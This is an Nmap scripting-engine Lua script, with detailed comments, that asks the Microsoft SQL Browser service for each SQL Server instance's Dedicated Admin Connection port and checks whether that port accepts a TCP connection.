local coroutine = require "coroutine"
local mssql = require "mssql"
local nmap = require "nmap"
local stdnse = require "stdnse"
local table = require "table"

description = [[
Queries the Microsoft SQL Browser service for the DAC (Dedicated Admin
Connection) port of a given (or all) SQL Server instance. The DAC port
is used to connect to the database instance when normal connection
attempts fail, for example, when server is hanging, out of memory or
in other bad states. In addition, the DAC port provides an admin with
access to system objects otherwise not accessible over normal
connections.

The DAC feature is accessible on the loopback adapter per default, but
can be activated for remote access by setting the 'remote admin
connection' configuration value to 1. In some cases, when DAC has been
remotely enabled but later disabled, the sql browser service may
incorrectly report it as available. The script therefore attempts to
connect to the reported port in order to verify whether it's
accessible or not.
]]

---
-- @usage
-- sudo nmap -sU -p 1434 --script ms-sql-dac <ip>
--
-- @output
-- | ms-sql-dac:
-- |_  Instance: SQLSERVER; DAC port: 1533
--
-- When the port advertised by the SQL Browser does not accept a plain TCP
-- connection, the line is suffixed with "(connection failed)" (see
-- discoverDAC below). The check is a TCP connect only; it does not speak
-- the TDS protocol, so it cannot tell a live DAC listener from another
-- service that happens to own the port.
--
-- Target selection is influenced by the mssql.instance-all,
-- mssql.instance-name and mssql.instance-port script arguments (see
-- hostrule below); their exact semantics are defined in the mssql
-- library -- TODO confirm there.
--

-- NSE script metadata consumed by the script engine. "safe" reflects that
-- the script only queries the browser service and attempts TCP connects.
author = "Patrik Karlsson"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}

--- Host rule: run when MS SQL instances are already known or may be found.
--
-- Two paths:
--   * the mssql library already performed discovery on this host -> run
--     only if it recorded at least one instance;
--   * otherwise -> run if an instance was selected via script arguments,
--     or if 1434/udp (SQL Browser) is open or open|filtered.
--
-- @param host the host table supplied by NSE
-- @return true when the script should run; false or nil otherwise
hostrule = function(host)
  local helper = mssql.Helper

  if helper.WasDiscoveryPerformed(host) then
    return helper.GetDiscoveredInstances(host) ~= nil
  end

  -- an explicit instance selection makes the browser port irrelevant
  local explicit = stdnse.get_script_args({
    "mssql.instance-all", "mssql.instance-name", "mssql.instance-port"
  })
  if explicit ~= nil then
    return true
  end

  local browser = nmap.get_port_state(host, {number = 1434, protocol = "udp"})
  if not browser then
    return
  end
  return (browser.state == "open" or browser.state == "open|filtered") or nil
end

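--- Check whether a TCP connection to `port` on `host` succeeds.
--
-- This only proves that something completes a TCP handshake on the
-- reported DAC port; it does not speak TDS, so another service holding
-- the port would also pass.
--
-- @param host    the host table supplied by NSE
-- @param port    port number to connect to (as returned by
--                mssql.Helper.DiscoverDACPort)
-- @param timeout optional socket timeout in milliseconds; defaults to
--                5000, the value hard-coded before this parameter existed
-- @return the first value returned by socket:connect (true on success)
local function checkPort(host, port, timeout)
  local s = nmap.new_socket()
  s:set_timeout(timeout or 5000)
  local status = s:connect(host, port, "tcp")
  -- release the socket whether or not the connect succeeded
  s:close()
  return status
end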

--- Worker thread: look up the DAC port of one instance and record it.
--
-- Runs under stdnse.new_thread. Appends one line to `result` when the
-- SQL Browser reported a DAC port (marked "(connection failed)" when a
-- TCP connect to that port does not succeed), then signals the condition
-- variable that `action` waits on. Nothing is appended when no port was
-- reported.
--
-- @param host   the host table supplied by NSE
-- @param name   instance name, already stripped of its host\ prefix
-- @param result shared table of output lines; also the condvar key
local function discoverDAC(host, name, result)
  local done = nmap.condvar(result)
  stdnse.debug2("Discovering DAC port on instance: %s", name)

  local dac_port = mssql.Helper.DiscoverDACPort(host, name)
  if dac_port then
    -- the browser may advertise a port that no longer accepts connections
    local fmt = "Instance: %s; DAC port: %s (connection failed)"
    if checkPort(host, dac_port) then
      fmt = "Instance: %s; DAC port: %s"
    end
    result[#result + 1] = fmt:format(name, dac_port)
  end

  done("signal")
end

--- Script action: find and verify the DAC port of each targeted instance.
--
-- Instance selection is delegated to the mssql library: when nothing was
-- explicitly targeted, discovery is run (if not already done) and every
-- discovered instance is used. One worker thread per instance runs
-- discoverDAC; the action then sleeps on the shared condvar until every
-- worker coroutine is dead.
--
-- @param host the host table supplied by NSE
-- @return the collected lines passed through stdnse.format_output
action = function(host)
  local result = {}
  local pending = {}
  local wake = nmap.condvar(result)
  local helper = mssql.Helper

  local targeted, instances = helper.GetTargetInstances(host)
  if not targeted then
    -- nothing explicitly targeted: fall back to everything discovered
    if not helper.WasDiscoveryPerformed(host) then
      helper.Discover(host)
    end
    instances = helper.GetDiscoveredInstances(host)
  end

  -- the pattern drops everything up to and including the first backslash
  -- of GetName(); instances whose name has no backslash are skipped
  for _, inst in ipairs(instances or {}) do
    local short = inst:GetName():match("^[^\\]*\\(.*)$")
    if short then
      pending[stdnse.new_thread(discoverDAC, host, short, result)] = true
    end
  end

  -- reap finished workers; block on the condvar while any are still alive
  while next(pending) do
    for co in pairs(pending) do
      if coroutine.status(co) == "dead" then
        pending[co] = nil
      end
    end
    if next(pending) then
      wake("wait")
    end
  end

  return stdnse.format_output(true, result)
end

